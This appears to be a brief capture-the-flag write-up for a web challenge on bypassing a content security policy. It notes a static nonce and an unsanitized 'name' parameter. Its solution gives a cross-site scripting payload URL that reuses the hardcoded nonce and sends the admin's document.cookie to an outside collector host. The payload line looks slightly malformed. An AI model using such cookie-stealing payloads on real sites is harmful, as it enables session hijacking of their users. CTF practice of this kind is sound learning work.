Difficulty:

Notes:
- NONCE is static per deployment
- queryParam `name` is not sanitized before

Rabbit Holes:

Solution:
Simple XSS payload extracting the cookie from the admin. The nonce is static and can be hardcoded.
https://babier-csp.dicec.tf/?name=lemon <script nonce=LRGWAXOY98Es0zz0QOVmag==> location.window="http://enk6w2e573qoxoa.m.pipedream.net/%22+document.cookie+%22speckij";